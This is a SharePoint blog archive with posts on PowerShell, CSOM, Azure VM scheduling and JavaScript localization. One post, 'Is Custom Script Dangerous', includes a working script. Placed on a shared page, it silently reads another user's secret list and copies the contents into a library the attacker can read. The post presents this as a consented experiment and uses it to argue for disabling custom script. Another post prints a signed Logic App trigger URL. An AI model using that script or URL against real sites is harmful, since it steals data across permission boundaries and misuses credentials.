CHUVASH.eu

CHunky Universe of Vigourous Astonishing SHarepoint :)

Tag Archives: script

Smarter way of loading SharePoint CSOM dll in PowerShell

Have you also got a legacy powershell script that loads SharePoint dlls and runs CSOM code directly? It’s quite easy to convert to PnP PowerShell. But if you run out of time and just need to execute the script, then I have a quick tip for you.

First of all, a CSOM script can be recognized by Add-Type commands (or Import-Module) plus the SharePoint dll paths.

Loading the dll the old way.

The odds are high that you don’t have those directories and files, unless you run it on a SharePoint Server (who would do that at all?) or you have installed the SharePoint SDK.

SharePoint SDK can be downloaded and installed (as suggested here), but why would you want to do that? An easier way is just to locate the files that are distributed with the PnP.PowerShell module, let me show how to do that.

All the dlls are available from the PnP.PowerShell module directory:

So the only thing you need to do is to re-point the path from the original (the “GAC”) folder to the PnP.PowerShell folder. You don’t need to guess the folder. It’s easy.

Thanks to the PowerTip: Find the Path to a PowerShell Module (Scripting Guy) I could find a way to read the information dynamically, so it doesn’t matter where your folder actually is. The fact what version number the module has, what OS you run on, and whether or not you installed it for your user account only or for all users on your computer – allt that has impact on the folder location. So we need to read the right path and then use it in the Add-Type command.

$pnpModule = Get-Module ListAvailable PnP.Powershell
$base = $pnpModule.ModuleBase
Connect-PnPOnline $url Interactive
Add-Type Path "$base\Framework\Microsoft.SharePoint.Client.dll"
Add-Type Path "$base\Framework\Microsoft.SharePoint.Client.Runtime.dll"
view raw add-type-csom.ps1 hosted with ❤ by GitHub

Other notes

The PnP.PowerShell is built on top of.NET Core and it works cross plattform, that’s better.

Loading dlls on a Mac.

If your legacy script does not work with the newer PnP.PowerShell, you might need to install the older PnP PowerShell and adjust the module name in the script above accordingly.

The SharePoint SDK is built on top of .NET Framework (as of my understanding) and it can only be installed on a Windows machine.

The SharePoint SDK requires local administrator rights to be installed. The PnP.PowerShell can be installed for a user without beeing an administrator by adding -Scope CurrentUser (to the Install-Module), which makes the work much smoother.

If you have two or more versions of the PnP.PowerShell module installed, you have to adjust the script a little by loading only the latest version of the module:

$pnpModule = Get-Module PnP.PowerShell ListAvailable | Sort-Object Version Descending | Select-Object First 1

That was a quick tip on how you can use the types from the original CSOM libraries when you don’t have time to convert a script to a PnP code or if there is some functionality that is not covered in PnP yet (not quite sure if there is something you cannot do with PnP that you can do with CSOM).

The good sides of that approach:

  • it can be a step towards rewriting a legacy script to a newer PnP.PowerShell
  • the dlls are up-to-date thanks to an easy way to update the PowerShell Module (Update-Module)
  • it is cross platform, meaning you can execute your legacy script on a linux or on a Mac as well, good for automation!

A cost effective way of running legacy scripts in the cloud

Have you also got some old huge scripts that run on a server locally? Have you also considered moving them to the cloud? Here comes an idea of how to do it quickly and easy.

In my case I have some older powershell scripts that are harder to convert to serverless applications:

  • They use MSOnline module in PowerShell, hence they require rewriting to AzureAD before using them in an Azure Function
  • They take around 15 minutes to complete, Azure Functions Consumption Plan is limited to 10 minutes. Of course I can split them in several parts, but I am looking for an easy way right now, I have to postpone refactoring because I am not sure if there is a real need for this script solution.
  • They process a lot of data and consume more that 400 MB memory which makes it crash when I put it in a Azure Automation Runbook.

Well, maybe a Windows Server VM in Azure is the only way? While recently setting up a minecraft server and following a blog post that proposes auto shutdown and logic apps to start the server, I came up with an idea to use exactly the same approach to make it as cost effective as possible.

The script solution I’ve got needs 15 minutes to complete. It runs every night. 23 hours and 45 minutes a day, the vm is not needed at all, I can stop it. Here is what I’ve tried and got working:

  1. A logic app that starts once a day
  2. It turns on the Windows Server VM
  3. A powershell script runs as a job scheduled to run at startup
  4. Once done, the powershell makes an http call to the Stop logic app
  5. The logic app stops and deallocates the Windows server VM

Job at startup (3)

PowerShell has a native way to register jobs that run at startup. I just followed this digestable guide:

I created a new folder: C:\Scripts

I copied my legacy script to that folder, let’s call it ‘Legacy.ps1’ for the sake of simplicity, then I created a startup job by running these two lines:

$trigger = New-JobTrigger -AtStartup -RandomDelay 00:00:30
Register-ScheduledJob -Trigger $trigger -FilePath C:\Scripts\Legacy.ps1 -Name Legacy

The Windows Server VM (3)

I created a Windows Server 2019 Datacenter Server Core VM to make it as lightweight as possible. I put it in a separate resource group, I didn’t reserve any ip addresses, nor dns names. I disabled even all ports including the RDP to have the highest security.

Other specs:

  • CPU: 1vCPU
  • Size: Standard B1ms
  • RAM: 2GB
  • HDD: HDD (no redundancy)
My choice of the vm image.

The start logic app (1, 2)

In the same resource group I created a logic app that turns on the VM daily at 00:13 UTC.

Easy, isn’t it.

Once started the vm triggers a scheduled – the Legacy.ps1 script.

In the end of the script there is an http call to my ‘Stop’ logic app:

Invoke-WebRequest -Uri "https://prod-32.westeurope.logic.azure.com:443/workflows/daf4a94e9d334032848f23b2651da35d/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=45c3PJfdneqSgwU8lhrbvD09YKd0s_L55FlxvON4Bajs"

The stop logic app (4,5)

Obviously, the trigger I use in my next logic app is an http request.

Whenever it is triggered is stops and deallocates the vm.

What does it cost?

I’ll save this discussion for later. Maybe It costs more than serverless applications, for sure, but less than a vm that is on and idle for hours every day. What I propose is a workaround for running huge legacy Windows scripts on Azure, in case you don’t have time to refactor your legacy scripts.

The cost of the last three days.

Is Custom Script Dangerous

Allowing custom script has its security implications. But what exactly does it mean? Is it dangerous? My colleauge Daniel and me have done a little experiment. There are two implications stated on MS Docs:

  • Scripts have access to everything the user has access to.
  • Scripts can access content across several Office 365 services and even beyond with Microsoft Graph integration.

To summarize, we can look at that picture:

So the risk that user 1 (the Blue User) intentionally or unintentionally places a script and lets user 2 (the Red User) run this script by linking to the page that has this script. The page must be in a “common” place.

Let’s try that. Let’s have a little hackathon.

Experiment A. Very Simple.

Scenario: the Red User (my colleague Daniel) has a site with with sensitive information (He has a list called Secrets). The Blue user (me) does not have access to that site. The Red User accidentially shares the link to the secret list. Now, to prove the security risks with the custom script, the Blue User has to get the secret information.

To make it more visual and fun, we have found a box where we have put candies and locked it with a combination lock. The code (the combination) is stored in the Secrets list.

The combination consists of three digits from 0 to 9. So there are 1000 possible combinations.

Since the Red User knows that he is going to be hacked, he acts as normal as possible, not especially suspicious. And since the experiment A is a simple one, we let the Red User to accidentially show the link to the Secrets list. That can be:

  • A screenshot that shows something else but contains the confidential site url
  • An email that is sent to a wrong recipient
  • A pasted link in a wrong Teams chat
  • etc.

So the Blue User finds out that there is a Secrets list that has the following address:

/sites/DailyWork/Lists/Secrets

“Fortunately”, the Blue User has access to a classic site (where Custom Script is allowed). He shares that site with the Red User. Now both the Blue User and the Red User have it in common.

Then, a new Web Part Page is added with a tiny script.

try {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/sites/DailyWork/_api/web/Lists/GetByTitle('Secrets')/Items", true);
xhr.setRequestHeader("Accept","application/json;odata=nometadata");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status == 200) {
var content = xhr.responseText;
var time = new Date().getTime();
var url = _spPageContextInfo.webServerRelativeUrl
+ "/_api/web/getfolderbyserverrelativeurl('Shared Documents')/Files/add(overwrite=true, url='"
+ time + ".json')";
var xhrUpload = new XMLHttpRequest();
xhrUpload.open("POST", url, true);
xhrUpload.setRequestHeader("Content-Type", "text/plain")
xhrUpload.setRequestHeader("X-RequestDigest", __REQUESTDIGEST.value);
xhrUpload.send(content);
}
}
}
xhr.send(null);
}
catch(e) { /* do nothing */ }
view raw get-secret.js hosted with ❤ by GitHub

That script makes a REST call to the Secrets list and uploads the result in Shared Documents. For the sake of simplicity, a built-in document library is used. An attacker would probably add a hidden list for that.

Now to get the Red User to that page, the Blue User adds some “important” information so that the Red User will not become suspiciuos.

The “important” information and the actual script editor

Now it is just the matter of sending a link to the Red User. The Red User navigates to that page and the script is executed while he is reading the information on that page.

The Blue User gets the Secret that was generated by the Red User:

With that information the Blue User has hacked the combination lock and he can now open the red box with candies!

Skitgott Candy

Experiment B. Harder

For now I think it is enough with the Experiment A, the Simple Experiment. We have proved, that, indeed, security is compromised with custom script allowed. A user can get confidential information from another user. Maybe some of you want to set up a more sophisticated experiment. Make sure the “hacked” person is warned and agrees to be part of an ethical hacking act. We maybe can try more to show the importance of keeping custom script disabled and not using classic sites that have it by default.

Wrapping up

Custom Script (or DenyAddAnCustomizePages=false) is dangerous, it is of course not black and white. It provide the ability to have small appications directly on sites created by users. But as with all other aspects of IT, you should know what you are doing. Every site with custom script is a potential trojan horse. Minimizing the number of classic sites and sites with custom scripts lowers the risk. All the collaboration sites should be modern team sites without custom script.

JavaScript Localization in SharePoint

Yesterday Waldek Mastykarz published a cool post: Globalizing JavaScript in SharePoint 2013. This is a very cool technique to localize your client code in javascript and reuse your resx files in Server Side and Client Side. This is actually not new for SharePoint 2013 despite it has become more needed with the huge client focus in the new SharePoint. I have used this in SharePoint 2010 for a long time. In my blog post: ScriptResx.ashx in SharePoint I told about that technique. What I didn’t know that you can define your javascript namespace directly in the resx file. Waldek wrote in his comment that SP.Publishing.Resources.en-US.resx automatically are SP.Publishing.Resources in javascript. That was not the case for my own localization files. A simple look at SP.Publishing.Resources.en-US.resx helped:

scriptresx

  <!-- 
    Whether this .resx could be read by scriptResx.ashx handler. Only a file
    marked with scriptResx:true could be returned to client.
  -->
  <resheader name="scriptResx">
    <value>true</value>
  </resheader>
  <!-- the full name of the JavaScript class.  -->
  <resheader name="classFullName">
    <value>SP.Publishing.Resources</value>
  </resheader>

This results in:

_EnsureJSNamespace('SP.Publishing');

So what we have to do for our custom resx file is to add classFullName resheader:

  <resheader name="classFullName">
    <value>Takana.Res</value>
  </resheader>

PowerShell: Copy an entire document library from SharePoint 2007 to disk

For a while ago I needed to copy all files from a document library within a SharePoint 2007 site to the hard drive. So I didn’t need to copy files from SharePoint to SharePoint so I couldn’t use the stsadm -o export command or Chris O’Brien’s nice SharePoint Content Deployment Wizard. I came across the SPIEFolder application which should work with SharePoint 2007 and 2010. It has a site on codeplex: spiefolder.codeplex.com, but neither the binary nor the source code can be downloaded from there. After some searching I found the binary in the author’s skydrive. The fact that the source code was not available seemed as an disanvantage because I could not know what code was run. Nevertheless I tried it out and it didn’t work:

spiefolder -o export -url "http://dev/Documents" -directory c:\tolle\Documents –recursive

I got the following error:

The Web application at http://dev/Documents could not be found. Verify that you have typed the URL correctly. If the URL should be serving existing content, the system administrator may need to add a new request URL mapping to the intended application.

So I wrote my own code to copy the documents. To write a console application feels so yesterdayish, so it is written in PowerShell. Even if there are no PowerShell snapins for SharePoint 2007, you have access to the entire Server Object Model, the only thing you have to do is to load the SharePoint assembly:

[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SharePoint")

Then you can instantiate all SharePoint objects like in C#, but in a PowerShell way:

$site = new-Object Microsoft.SharePoint.SPSite("http://dev")
$web = $site.OpenWeb()

You can even download a module for emulating cmdlets: Get-SPWeb, Get-SPWebApplication and Get-SPFarm, written by Natalia Tsymbalenko (sharing-the-experience.blogspot.com) to get started or just to find some inspiration.

I have created a ps1-script which only does one thing – it copies an entire document library to disk. Much of inspiration to structure the script comes from “Delete-SPListItems” (sharepointryan.com).

Here it is: Pull-Documents.ps1

<#
.Synopsis
    Use Pull-Documents to copy the entire document library to disk
.Description
    This script iterates recursively over all directories and files in a document library and writes binary data to the disk
    The structure is kept as in the Document library
    It is mainly written for SharePoint 2007, but it works even in SharePoint 2010
.Example
    Pull-Document -Url http://dev -Library "Shared Documents"
.Notes
    Name: Pull-Documents.ps1
    Author: Anatoly Mironov
    Last Edit: 2012-12-03
    Keywords: SPList, Documents, Files, SPDocumentLibrary
.Links
    https://sharepointkunskap.wordpress.com
    http://www.bool.se
.Inputs
    None
.Outputs
    None
#Requires -Version 1.0
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true)][System.String]$Url = $(Read-Host -prompt "Web Url"),
[Parameter(Mandatory=$true)][System.String]$Library = $(Read-Host -prompt "Document Library")
)
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SharePoint")

$site = new-object microsoft.sharepoint.spsite($Url)
$web = $site.OpenWeb()
$site.Dispose()

$folder = $web.GetFolder($Library)
$folder # must output it otherwise "doesn't exist" in 2007

if(!$folder.Exists){
    Write-Error "The document library cannot be found"
    $web.Dispose()
    return
}

$directory = $pwd.Path

$rootDirectory = Join-Path $pwd $folder.Name

if (Test-Path $rootDirectory) {
    Write-Error "The folder $Library in the current directory already exists, please remove it"
    $web.Dispose()
    return
}

#progress variables
$global:counter = 0
$global:total = 0
#recursively count all files to pull
function count($folder) {
    if ($folder.Name -ne "Forms") {
        $global:total += $folder.Files.Count
        $folder.SubFolders | Foreach { count $_ }
    }
}
write "counting files, please wait..."
count $folder
write "files count $global:total"

function progress($path) {
    $global:counter++
    $percent = $global:counter / $global:total * 100
    write-progress -activity "Pulling documents from $Library" -status $path -PercentComplete $percent
}

#Write file to disk
function Save ($file, $directory) {
    $data = $file.OpenBinary()
    $path = Join-Path $directory $file.Name
    progress $path
    [System.IO.File]::WriteAllBytes($path, $data)
}

#Forms folder doesn't need to be copied
$formsDirectory = Join-Path $rootDirectory "Forms"

function Pull($folder, [string]$directory) {
    $directory = Join-Path $directory $folder.Name
    if ($directory -eq $formsDirectory) {
        return
    }
    mkdir $directory | out-null

    $folder.Files | Foreach { Save $_ $directory }

    $folder.Subfolders | Foreach { Pull $_ $directory }
}

Write "Copying files recursively"
Pull $folder $directory

$web.Dispose()

I have tested this script in SharePoint 2007 and 2010. It works. Let me know if you find this useful or have some suggestions.

defaultvärde på parametern i powershellfunktioner

Läser ett intressant inlägg om deployskript i powershell. Har upptäckt att man kan stoppa in ett defaultvärde i funktionens parameter. Så i stället för

function hello($name) {
  Write-Host $name
}

Kan man köra:

function hello($name = "Gregor") {
  Write-Host $name
}

Mycket smidigt.

PowerShell

PowerShell är ett sätt att manipulera data och struktur i SharePoint-portalen. Samma uppgifter låter göras med konsoll-applikationer. Fördelen med PowerShell är att man kan skapa skript som är flexibla och kan köras med olika parametrar. PowerShell påminner starkt om shell-skript i Linux. För mig som egentligen kommer snarare från bash-världen. Där har Microsoft låtit sig inspireras starkt :).

PowerShell icon

Det finns en bok om PowerShell, skriven av svenskar, som låter intressant.

Man behöver inte heller uppfinna hjul på nytt: det finns färdiga skripts som man direkt. Bara man skriver rätt parametrar. Här är ett ställe där man kan hitta skripts. Det finns många sidor som förklarar hur man skriver skript.

Daniel Chronlund Cloud Tech Blog

News, tips and thoughts for Microsoft cloud fans

Вула Чăвашла

VulaCV - Чăвашла вулаттаракан сайт

Discovering SharePoint

And going crazy doing it

Bram de Jager - Architect, Speaker, Author

Microsoft 365, SharePoint and Azure

SharePoint Dragons

Nikander & Margriet on SharePoint

Mai Omar Desouki

PFE @ Microsoft

Cameron Dwyer

Office 365, SharePoint, Azure, OnePlace Solutions & Life's Other Little Wonders

paul.tavares

Me and My doings!

Share SharePoint Points !

By Mohit Vashishtha

Jimmy Janlén "Den Scrummande Konsulten"

Erfarenheter, synpunkter och raljerande om Scrum från Jimmy Janlén

Aryan Nava

DevOps, Cloud and Blockchain Consultant

SPJoel

SharePoint for everyone

SharePointRyan

Ryan Dennis is a SharePoint Solution Architect with a passion for SharePoint and PowerShell

SharePoint 2020

The Vision for a Future of Clarity

Aharoni in Unicode

Treacle tarts for great justice

... And All That JS

JavaScript, Web Apps and SharePoint

blksthl

Mostly what I know and share about...